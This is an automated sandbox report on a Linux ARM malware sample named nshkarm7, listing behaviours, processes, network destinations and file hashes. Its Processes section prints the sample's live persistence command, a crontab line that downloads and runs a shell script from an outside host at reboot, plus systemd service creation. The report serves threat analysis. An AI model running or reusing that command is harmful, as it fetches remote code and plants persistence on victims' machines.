Malware Analysis Report

2024-11-13 15:55

Sample ID 241027-nnwmbsxhqj
Target nshkarm7
SHA256 0511626122126321b2a14924a2258e9161a10e803b1a313f855038f80f5e4047
Tags
defense_evasion discovery execution persistence privilege_escalatio privilege_escalation
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

0511626122126321b2a14924a2258e9161a10e803b1a313f855038f80f5e4047

Threat Level: Shows suspicious behavior

The file nshkarm7 was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio privilege_escalation

File and Directory Permissions Modification

Renames itself

Unexpected DNS network traffic destination

Creates/modifies Cron job

Modifies systemd

Changes its process name

Command and Scripting Interpreter: Unix Shell

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-27 11:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-27 11:33

Reported

2024-10-27 11:36

Platform

debian12-armhf-20240221-en

Max time kernel

138s

Max time network

165s

Command Line

[/tmp/nshkarm7 massload]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/nshkarm7 N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 81.169.136.222 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.h0TO7G /usr/bin/crontab N/A

Modifies systemd

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /lib/systemd/system/bot.service /tmp/nshkarm7 N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself /bin/busybox telentd /tmp/nshkarm7 N/A

Command and Scripting Interpreter: Unix Shell

execution
Description Indicator Process Target
N/A N/A /bin/sh N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /bin/systemctl N/A
File opened for reading /proc/mounts /tmp/nshkarm7 N/A

Processes

/tmp/nshkarm7

[/tmp/nshkarm7 massload]

/bin/sh

[/bin/sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/sh

[/bin/sh -c /bin/systemctl enable bot]

/bin/systemctl

[/bin/systemctl enable bot]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian12-armhf-20240221-en-15 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-15 udp
US 1.1.1.1:53 debian12-armhf-20240221-en-15 udp
DE 81.169.136.222:53 kingstonwikkerink.dyn udp
CZ 195.133.92.51:14086 kingstonwikkerink.dyn tcp
US 1.1.1.1:53 debian12-armhf-20240221-en-15 udp

Files

/var/spool/cron/crontabs/tmp.h0TO7G

MD5 4e8f2dd2ff3982760f0088f33f22f0f1
SHA1 7ad467c66e98f869702876169dd916ad3033dc4e
SHA256 6d1322cb3e7a0357ca60c53ad8841df0ec7ead693e6dc0336b3e684f8d1e728a
SHA512 57f4f7d906555c98a746b44f412577673b7025e2b369b3ee637bdcf758a1de2ce38596e36c3e20bb1b6ea1a8bdca154cdbe3d688315bad06e042dd34153160ff

/usr/lib/systemd/system/bot.service

MD5 a4e30f6ce6fb6cf00e133f3c93fb5449
SHA1 67b7de93a672ada4abfe11e339dc2e270c61b69d
SHA256 a911f4bb5c69ad831fd6dc9004e52e656a846b2d7cbf152ab80c9b3928062ede
SHA512 893cda7cdcb75aceef89c64a38004feff8e5867e7bc76c622a49adfbff3fbb2c7916de6165ed4c43b4c7dabb5b56271e5a1b8a08d02b84389da92ec177289c25